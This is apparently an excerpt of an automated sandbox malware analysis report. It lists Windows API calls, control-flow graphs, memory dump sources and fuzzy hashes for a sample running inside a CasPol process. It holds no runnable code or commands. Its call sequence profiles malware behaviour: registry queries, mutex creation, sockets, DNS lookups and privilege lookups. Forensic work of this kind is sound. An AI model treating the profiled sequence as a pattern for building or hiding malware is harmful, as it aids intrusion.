          • Instruction Fuzzy Hash: BD31B476504344BFE721DB51DC88FA6FBACEF04714F04489AFA889B192D375A948CB71

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 78 2180aaaa-2180ab35 82 2180ab37 78->82 83 2180ab3a-2180ab51 78->83 82->83 85 2180ab93-2180ab98 83->85 86 2180ab53-2180ab66 RegOpenKeyExW 83->86 85->86 87 2180ab68-2180ab90 86->87 88 2180ab9a-2180ab9f 86->88 88->87
          APIs
          • RegOpenKeyExW.KERNEL32(?,00000EA8), ref: 2180AB59
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: Open
          • String ID:
          • API String ID: 71445658-0
          • Opcode ID: 83ecbbb7c7ff285975d2f0d72d05b6520c9c2c5cde08709eac06bccce5b7147f
          • Instruction ID: dc1562fa795997891ed2bc31bc456de893fe97ffe3df826149094ec2385d3249
          • Opcode Fuzzy Hash: 83ecbbb7c7ff285975d2f0d72d05b6520c9c2c5cde08709eac06bccce5b7147f
          • Instruction Fuzzy Hash: 4F31C576544384AFE722DB11CC45FA7BFBCEF06310F08889AF9859B153D265A509CB72

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 93 23d60eb4-23d60f32 97 23d60f37-23d60f43 93->97 98 23d60f34 93->98 99 23d60f45 97->99 100 23d60f48-23d60f51 97->100 98->97 99->100 101 23d60fa2-23d60fa7 100->101 102 23d60f53-23d60f77 CreateFileW 100->102 101->102 105 23d60fa9-23d60fae 102->105 106 23d60f79-23d60f9f 102->106 105->106
          APIs
          • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 23D60F59
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: CreateFile
          • String ID:
          • API String ID: 823142352-0
          • Opcode ID: 7d581a1df584cc3b39d05ed613ddb311ab96cf5d7d3ba52097bd64e675193d1e
          • Instruction ID: 382e179cb245ca2ba8b168889771c4363a2fae8f1bb737315952e19d6eb7b368
          • Opcode Fuzzy Hash: 7d581a1df584cc3b39d05ed613ddb311ab96cf5d7d3ba52097bd64e675193d1e
          • Instruction Fuzzy Hash: 9F319071505380AFE721CF25DC44F66BBE8EF05624F08849EE9858B252D365E419CB72

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 109 2180aba1-2180ac1f 112 2180ac21 109->112 113 2180ac24-2180ac2d 109->113 112->113 114 2180ac32-2180ac38 113->114 115 2180ac2f 113->115 116 2180ac3a 114->116 117 2180ac3d-2180ac54 114->117 115->114 116->117 119 2180ac56-2180ac69 RegQueryValueExW 117->119 120 2180ac8b-2180ac90 117->120 121 2180ac92-2180ac97 119->121 122 2180ac6b-2180ac88 119->122 120->119 121->122
          APIs
          • RegQueryValueExW.KERNEL32(?,00000EA8,9E0939A2,00000000,00000000,00000000,00000000), ref: 2180AC5C
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: QueryValue
          • String ID:
          • API String ID: 3660427363-0
          • Opcode ID: 4f89f4cc647fc73871902a44213f20e3613f2756ed0c8b377f29afefa0ecdb15
          • Instruction ID: de01e949cc6d840b9ce0a603614587b6cc2e7a35799100340f016015ab185e54
          • Opcode Fuzzy Hash: 4f89f4cc647fc73871902a44213f20e3613f2756ed0c8b377f29afefa0ecdb15
          • Instruction Fuzzy Hash: C231C476105384AFE722CF21CC84FA6BFF8EF06314F08849AE985CB153D264E948CB61

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 126 23d60242-23d602c5 130 23d602c7 126->130 131 23d602ca-23d602d3 126->131 130->131 132 23d602d5 131->132 133 23d602d8-23d602e1 131->133 132->133 134 23d60332-23d60337 133->134 135 23d602e3-23d60307 CreateMutexW 133->135 134->135 138 23d60339-23d6033e 135->138 139 23d60309-23d6032f 135->139 138->139
          APIs
          • CreateMutexW.KERNEL32(?,?), ref: 23D602E9
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: CreateMutex
          • String ID:
          • API String ID: 1964310414-0
          • Opcode ID: 225a7734d75413fc575a352d94d283ee5381f5af76b50e4cc8d955b646bee7a2
          • Instruction ID: 5c0f604e7236fcfff55d9fd91f17640aa825b3cba230bf7315decca2a4a8928f
          • Opcode Fuzzy Hash: 225a7734d75413fc575a352d94d283ee5381f5af76b50e4cc8d955b646bee7a2
          • Instruction Fuzzy Hash: D631AD755093806FE712DB25DC85B96BFA8EF06314F08849AE984CB293D365A909CB62

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 142 23d61f1e-23d61fa5 147 23d61fa7 142->147 148 23d61faa-23d61fb3 142->148 147->148 149 23d61fb5-23d61fbd ConvertStringSecurityDescriptorToSecurityDescriptorW 148->149 150 23d6200b-23d62010 148->150 152 23d61fc3-23d61fd5 149->152 150->149 153 23d61fd7-23d62008 152->153 154 23d62012-23d62017 152->154 154->153
          APIs
          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000EA8), ref: 23D61FBB
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: DescriptorSecurity$ConvertString
          • String ID:
          • API String ID: 3907675253-0
          • Opcode ID: a4b86380d8589d2bccc92dad527ce12ce6a75bbaec9e4572ed3a21a611608fb3
          • Instruction ID: ca007925cedbf204aab2c745f860c70a82430e48b30b308bed5908929304607b
          • Opcode Fuzzy Hash: a4b86380d8589d2bccc92dad527ce12ce6a75bbaec9e4572ed3a21a611608fb3
          • Instruction Fuzzy Hash: 6B21D576504344AFE721DF65DC45F6BFFACEF45310F08849AE984DB152D364A908CB62

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 158 23d605f7-23d60679 161 23d6067e-23d60684 158->161 162 23d6067b 158->162 163 23d60686 161->163 164 23d60689-23d606a0 161->164 162->161 163->164 166 23d606d7-23d606dc 164->166 167 23d606a2-23d606b5 RegQueryValueExW 164->167 166->167 168 23d606b7-23d606d4 167->168 169 23d606de-23d606e3 167->169 169->168
          APIs
          • RegQueryValueExW.KERNEL32(?,00000EA8,9E0939A2,00000000,00000000,00000000,00000000), ref: 23D606A8
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: QueryValue
          • String ID:
          • API String ID: 3660427363-0
          • Opcode ID: e67d9b1e6e5b33dcc0413974a51bbc60bdbedf0059718dad2f47def2b5285433
          • Instruction ID: 3bfc98cf5d1dc0dcd5ec842c10ef1fb333426f1f7783632a41cbd8344aa8a930
          • Opcode Fuzzy Hash: e67d9b1e6e5b33dcc0413974a51bbc60bdbedf0059718dad2f47def2b5285433
          • Instruction Fuzzy Hash: C931B1751093806FD722DB61DC44F92BFB8EF06614F0C84DAE9859B1A3D364A908CB76

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 173 23d62902-23d6295f 175 23d62962-23d629b4 FormatMessageW 173->175 177 23d629ba-23d629e3 175->177
          APIs
          • FormatMessageW.KERNEL32(?,00000EA8,?,?), ref: 23D629B2
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: FormatMessage
          • String ID:
          • API String ID: 1306739567-0
          • Opcode ID: 1842e40855b030048a1902b769b2df93e875ec59d24217dfc470a39bd822f45e
          • Instruction ID: eee76f8d800d8e1e698bb340458995d1025ce82f5f480f7dcf5df03a92e3313f
          • Opcode Fuzzy Hash: 1842e40855b030048a1902b769b2df93e875ec59d24217dfc470a39bd822f45e
          • Instruction Fuzzy Hash: 4D318F7650D3C45FD3038B618C65B66BFB4EF87610F0980CBD884CF2A3E6246919D7A2

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 179 23d62752-23d627ef 184 23d62841-23d62846 179->184 185 23d627f1-23d627f9 getaddrinfo 179->185 184->185 187 23d627ff-23d62811 185->187 188 23d62813-23d6283e 187->188 189 23d62848-23d6284d 187->189 189->188
          APIs
          • getaddrinfo.WS2_32(?,00000EA8), ref: 23D627F7
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: getaddrinfo
          • String ID:
          • API String ID: 300660673-0
          • Opcode ID: 5235767d20e8e31f7b556d7c7b7d791ae41746d1a027894328e84112b9c2bfeb
          • Instruction ID: b41a39983ef8d8dc9c21fe3c77d7a97306b987ef8fe94014bd487461d8ee68c1
          • Opcode Fuzzy Hash: 5235767d20e8e31f7b556d7c7b7d791ae41746d1a027894328e84112b9c2bfeb
          • Instruction Fuzzy Hash: A421A375500204AFE730EB51DC85FB6F7ACEF04714F04889AFA889A281D775A548CBB1

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 193 23d61352-23d613c7 197 23d6141f-23d61424 193->197 198 23d613c9-23d613d1 DuplicateHandle 193->198 197->198 199 23d613d7-23d613e9 198->199 201 23d61426-23d6142b 199->201 202 23d613eb-23d6141c 199->202 201->202
          APIs
          • DuplicateHandle.KERNELBASE(?,00000EA8), ref: 23D613CF
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: DuplicateHandle
          • String ID:
          • API String ID: 3793708945-0
          • Opcode ID: 7001de3c447a4439a70b43d9c8051c0c1f039ef07bb47d91daf7529665338f41
          • Instruction ID: c36c00af2534eaa8f12bc7e07a929f7ff4e6aeb2769cd1b4eb32f62f6020642a
          • Opcode Fuzzy Hash: 7001de3c447a4439a70b43d9c8051c0c1f039ef07bb47d91daf7529665338f41
          • Instruction Fuzzy Hash: 0221C176500304AFEB21AF61DC45F6AFBACEF04224F04886AE985CB651D774A549CBA2
          APIs
          • RegOpenKeyExA.KERNEL32(?,00000EA8), ref: 23D6049F
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: Open
          • String ID:
          • API String ID: 71445658-0
          • Opcode ID: 166fb0d04d4836f11e1e2ee735598ecda25d52ff22692b1076d45b722213a1ef
          • Instruction ID: d3f0d36da822bb28d8a41184797bcaa9948686b1441f6a15b14d77af50a348d4
          • Opcode Fuzzy Hash: 166fb0d04d4836f11e1e2ee735598ecda25d52ff22692b1076d45b722213a1ef
          • Instruction Fuzzy Hash: 0F21D8750093806FE7228F11DC45FA6FFB4EF06310F0884CAF9844B192D3656909CB72
          APIs
          • CreateActCtxA.KERNEL32(?,00000EA8,?,?), ref: 2180B092
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: Create
          • String ID:
          • API String ID: 2289755597-0
          • Opcode ID: e0a654faab905d55134bcc4fd46352e25997058c85f889cb5aa422e97e5bac6d
          • Instruction ID: 741f5ac21b63fa1c7db94459fcaa107adadcdacaf50c0858f3c08a1d57d59e75
          • Opcode Fuzzy Hash: e0a654faab905d55134bcc4fd46352e25997058c85f889cb5aa422e97e5bac6d
          • Instruction Fuzzy Hash: 9421C2715093C06FD3138B259C51B62BFB4EF87610F0A81DBE884DB693D225A919C7B2
          APIs
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: FileView
          • String ID:
          • API String ID: 3314676101-0
          • Opcode ID: 1f2add0a364c14c8372ded7de4bb3bcdfe86b2fb0af885f8ef22c598a30c7ffe
          • Instruction ID: 86502e83febf279bfd7c7cdc484558fb0870342d00e24b37aaed0b45cbeb0da5
          • Opcode Fuzzy Hash: 1f2add0a364c14c8372ded7de4bb3bcdfe86b2fb0af885f8ef22c598a30c7ffe
          • Instruction Fuzzy Hash: 3621B171405380AFE722CF15DC48F56FBF8EF09224F08849EE9858B252D365B508CB62
          APIs
          • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 23D60F59
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: CreateFile
          • String ID:
          • API String ID: 823142352-0
          • Opcode ID: 18bb91922ddc9bcdccd46b742902750af54aa31e0c12ad9464b21d7581721054
          • Instruction ID: 19dd45ac73307106580de216e9667cf645a0fc239064080eb12d66feed4dbd0f
          • Opcode Fuzzy Hash: 18bb91922ddc9bcdccd46b742902750af54aa31e0c12ad9464b21d7581721054
          • Instruction Fuzzy Hash: D621AE75504200AFEB20DF26DD84F66FBECEF08724F4884ADE9858B252D375E414CB62
          APIs
          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000EA8), ref: 23D61FBB
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: DescriptorSecurity$ConvertString
          • String ID:
          • API String ID: 3907675253-0
          • Opcode ID: 123a57a37f678d2c7d7c7f16190c999f45b714c39e5dbf3951844f581e349b8b
          • Instruction ID: b4afbc43a0298ff8c071f681ff59d9bf1f043cb6397f8483dace76c88abf0fd7
          • Opcode Fuzzy Hash: 123a57a37f678d2c7d7c7f16190c999f45b714c39e5dbf3951844f581e349b8b
          • Instruction Fuzzy Hash: 3C21A476500204AFE720EF25DC45F6AFBACEF04714F08846AE984DB252D764E519CF66
          APIs
          • ReadFile.KERNEL32(?,00000EA8,9E0939A2,00000000,00000000,00000000,00000000), ref: 23D61111
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: FileRead
          • String ID:
          • API String ID: 2738559852-0
          • Opcode ID: 75ece5e9a66ca8cfb4d6ab9990d10a78b557d464094ff98c9ce7fd25a32754c8
          • Instruction ID: a1baa5ffd58e782e6357e6a8d7a6a3e525b77783a4603f6ae72b065a5ab1b75c
          • Opcode Fuzzy Hash: 75ece5e9a66ca8cfb4d6ab9990d10a78b557d464094ff98c9ce7fd25a32754c8
          • Instruction Fuzzy Hash: A321A176409380AFD722CF21DC44F56BFB8EF06714F0884DBE9848B153C265A919CB76
          APIs
          • GetFileType.KERNEL32(?,00000EA8,9E0939A2,00000000,00000000,00000000,00000000), ref: 23D61045
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: FileType
          • String ID:
          • API String ID: 3081899298-0
          • Opcode ID: 50b9d3048eb966403286d5114a914368761f863e19b3dbd5492890f2eba849f4
          • Instruction ID: 59a01233ae467f2058fd6610fc4efcd2fe6877e40b6c3fbb085d2df409ba03bc
          • Opcode Fuzzy Hash: 50b9d3048eb966403286d5114a914368761f863e19b3dbd5492890f2eba849f4
          • Instruction Fuzzy Hash: F42107B54087C06FE7128B25DC44BA2BFACEF46724F0881DAE8C58B153D264A909C776
          APIs
          • RegQueryValueExA.KERNEL32(?,00000EA8), ref: 23D605AA
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: QueryValue
          • String ID:
          • API String ID: 3660427363-0
          • Opcode ID: f6b2736b6cea3a2db21bf2cf6c5b0e9ff8062b66cc2512312f13536ef5289216
          • Instruction ID: 53c5721d0a55e4a0f18a60235f0a296acff017f454c18c8c8ce3a32cab192430
          • Opcode Fuzzy Hash: f6b2736b6cea3a2db21bf2cf6c5b0e9ff8062b66cc2512312f13536ef5289216
          • Instruction Fuzzy Hash: 9F21B075100204AFEB219F11DC40FBAF7ACEF04714F44895AFA859A291D7B5A548CFA2
          APIs
          • RegOpenKeyExW.KERNEL32(?,00000EA8), ref: 2180AB59
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: Open
          • String ID:
          • API String ID: 71445658-0
          • Opcode ID: d7a8936efa4fd3d68ebba3c662598354ef3156b30d712171195940971cd1cba7
          • Instruction ID: 937f521ddc0a2311b75edfaa460972026c14a0b6157b1ea96833ead504fbf206
          • Opcode Fuzzy Hash: d7a8936efa4fd3d68ebba3c662598354ef3156b30d712171195940971cd1cba7
          • Instruction Fuzzy Hash: DE21D176500608AEE7219F11CC84F6BFBECEF04314F04885AE984DB252D774E548CBB2
          APIs
          • CreateMutexW.KERNEL32(?,?), ref: 23D602E9
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: CreateMutex
          • String ID:
          • API String ID: 1964310414-0
          • Opcode ID: fb9b7ea377bb8a714a8dad74cf50c51c4ff2ba71d30883c05a712f57275f18f1
          • Instruction ID: 3e9c2a973585e3fdb027ca1c7d0c7f6b8027c0365cb968aa59abc304e4970081
          • Opcode Fuzzy Hash: fb9b7ea377bb8a714a8dad74cf50c51c4ff2ba71d30883c05a712f57275f18f1
          • Instruction Fuzzy Hash: 8621D075504200AFE710DF25DD85F66FBE8EF08624F4884AEE984CB242D775E504CB66
          APIs
          • CreateDirectoryW.KERNEL32(?,?,9E0939A2,00000000,?,?,?,?,?,?,?,?,682E3C58), ref: 23D60E5F
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: CreateDirectory
          • String ID:
          • API String ID: 4241100979-0
          • Opcode ID: 1144e427c5a65dd689a2983281bf09e6c133f4f431174bec49e2502e570fbf2f
          • Instruction ID: 68e73f18a5802322df636782fb61c98047d1fe725808e7d8207004684d4d0482
          • Opcode Fuzzy Hash: 1144e427c5a65dd689a2983281bf09e6c133f4f431174bec49e2502e570fbf2f
          • Instruction Fuzzy Hash: 342192765093809FD711CF25DD54B56BFE8EF06610F0984EAE985CF263E264E908CB61
          APIs
          • DeleteFileA.KERNEL32(?,00000EA8), ref: 23D615BF
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: DeleteFile
          • String ID:
          • API String ID: 4033686569-0
          • Opcode ID: b8ff7c621400b46ea29474b20b8e86440b4104e34f13d13383704ada0bcb8b42
          • Instruction ID: e36297060f60e9d0818aaaee68933ff229b6e0d61117b4cc25814dfac5957db9
          • Opcode Fuzzy Hash: b8ff7c621400b46ea29474b20b8e86440b4104e34f13d13383704ada0bcb8b42
          • Instruction Fuzzy Hash: E721D8755043806FE721CB15DC45FA6FFA8DF05720F0880DEF9858B292D364A948CB66
          APIs
          • RegQueryValueExW.KERNEL32(?,00000EA8,9E0939A2,00000000,00000000,00000000,00000000), ref: 2180AC5C
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: QueryValue
          • String ID:
          • API String ID: 3660427363-0
          • Opcode ID: 1f1ab273aacc0fb9e64371b6882348ad5195d82a716f7c436c75db0fc0e684f9
          • Instruction ID: 2f456b97f4f205da77cb9dacced4addbe491aaf8e998d689b8ffcf15def2dcfb
          • Opcode Fuzzy Hash: 1f1ab273aacc0fb9e64371b6882348ad5195d82a716f7c436c75db0fc0e684f9
          • Instruction Fuzzy Hash: 3F21C07A200608AFE721CF11CC84FA6B7ECEF04710F04845AE945CB251D774E944CBB6
          APIs
          • GetTokenInformation.KERNELBASE(?,00000EA8,9E0939A2,00000000,00000000,00000000,00000000), ref: 23D6092C
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: InformationToken
          • String ID:
          • API String ID: 4114910276-0
          • Opcode ID: 2abe095b88ae316d5c04d9b415dc2b427aa7fde61e5ca25f7a1c78b0377421e7
          • Instruction ID: a4098917772c8fd89a972bf15c07637d1289288e64b2c404a725db6ff21ce4cc
          • Opcode Fuzzy Hash: 2abe095b88ae316d5c04d9b415dc2b427aa7fde61e5ca25f7a1c78b0377421e7
          • Instruction Fuzzy Hash: 7F11DFB6500244AFEB21DF21DC44FABB7ACEF04324F4884AAE985CB251D774A544CBB6
          APIs
          • DnsQuery_A.DNSAPI(?,00000EA8,?,?), ref: 23D61972
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: Query_
          • String ID:
          • API String ID: 428220571-0
          • Opcode ID: 2e8259ab11c71c8bfbc9bcf932fb33574cca5a57880fe123e482f6fbf3eb7cc8
          • Instruction ID: dae832374ef3a8a7364bc62d08f0b02800c9233817fc7171a1a87960ab2009f3
          • Opcode Fuzzy Hash: 2e8259ab11c71c8bfbc9bcf932fb33574cca5a57880fe123e482f6fbf3eb7cc8
          • Instruction Fuzzy Hash: 2D2127755093806FC3128B26CC51F32BFB8EF87620F0981CAE9845B653D225B915C7B2
          APIs
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: FileView
          • String ID:
          • API String ID: 3314676101-0
          • Opcode ID: 28abb79afcd2f8aefe2c0fc9173d204ddd60b1ef8fba0ee913914b6cd3abae28
          • Instruction ID: e3e6ae8e6ac0f07a0402f2af9f89dbc11f9b71ef6dcf06f67899839ccfaa1037
          • Opcode Fuzzy Hash: 28abb79afcd2f8aefe2c0fc9173d204ddd60b1ef8fba0ee913914b6cd3abae28
          • Instruction Fuzzy Hash: DD21F371504204AFE721DF15DC84F66FBE8EF08324F04849DEA848B251D379F548CBA2
          APIs
          • WSASocketW.WS2_32(?,?,?,?,?), ref: 23D61C76
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: Socket
          • String ID:
          • API String ID: 38366605-0
          • Opcode ID: 38c0a6152c70825a4e69d45851468c1f6567026d257d0301c9034e7b64c16471
          • Instruction ID: 31d1a3b1dadc15c6b679bb9a9f95844560f5ebe650cfe2c452c54c22025ac5af
          • Opcode Fuzzy Hash: 38c0a6152c70825a4e69d45851468c1f6567026d257d0301c9034e7b64c16471
          • Instruction Fuzzy Hash: 5321D475500200AFE721DF51DD45F6AFBE8EF04324F04889EE9858B251C375B415CB62
          APIs
          • K32EnumProcesses.KERNEL32(?,?,?,9E0939A2,00000000,?,?,?,?,?,?,?,?,682E3C58), ref: 23D6309E
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: EnumProcesses
          • String ID:
          • API String ID: 84517404-0
          • Opcode ID: e10354bea80e363122737d1d7d9d03f0e0513a620fd3e01137118853c25bfdc6
          • Instruction ID: f1c519a1c07094afc272e684da654904d0052c6a636a0b6a869797f5aba4eef0
          • Opcode Fuzzy Hash: e10354bea80e363122737d1d7d9d03f0e0513a620fd3e01137118853c25bfdc6
          • Instruction Fuzzy Hash: AC2192725093809FD712CF25DC44B96BFE8EF06220F0984EBE995CF163D225E908CB62
          APIs
          • RegQueryValueExW.KERNEL32(?,00000EA8,9E0939A2,00000000,00000000,00000000,00000000), ref: 23D606A8
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: QueryValue
          • String ID:
          • API String ID: 3660427363-0
          • Opcode ID: 31bea1be839dc2d490707a52651607cea4c7c38f979c188923e8e89878a224fe
          • Instruction ID: 94b129c90a66e9577fcf44a2fc4153c6f0da2b3c5e535ac1d229c76865d71548
          • Opcode Fuzzy Hash: 31bea1be839dc2d490707a52651607cea4c7c38f979c188923e8e89878a224fe
          • Instruction Fuzzy Hash: 0311EE76100204AFE720DF51DC44FA6F7ECEF44624F48849AEA859B292D764E448CFB6
          APIs
          • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 23D62DAA
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: LookupPrivilegeValue
          • String ID:
          • API String ID: 3899507212-0
          • Opcode ID: f3f7ce3539ddd459eb6c8d5c5824d57ac0455e3dea4ef2efdedd7c8279c082f1
          • Instruction ID: 28922add3f8d98a7dfd041af05d152cbf35bdfa2544a0e53d8ea7b71db3eab5a
          • Opcode Fuzzy Hash: f3f7ce3539ddd459eb6c8d5c5824d57ac0455e3dea4ef2efdedd7c8279c082f1
          • Instruction Fuzzy Hash: 2F113D766053809FD711CF25DC85B96BFE8EF06620F0884AEE985DB253D265E848CB61
          APIs
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: FindWindow
          • String ID:
          • API String ID: 134000473-0
          • Opcode ID: b792dbfa7d0a5eacc1ad9cf8c3c09affe8c893c8df3b2686d991448066feed04
          • Instruction ID: 1d31dc6cda0951c2837902aa4e93b405c4a724e6225c2c345692f24f85a42038
          • Opcode Fuzzy Hash: b792dbfa7d0a5eacc1ad9cf8c3c09affe8c893c8df3b2686d991448066feed04
          • Instruction Fuzzy Hash: E511A2755487849FD7128F25DC89B52BFB8EF07314F0980DAE9848F263D225E849CB62
          APIs
          • DeleteFileW.KERNEL32(?,9E0939A2,00000000,?,?,?,?,?,?,?,?,682E3C58), ref: 23D6006C
          Memory Dump Source
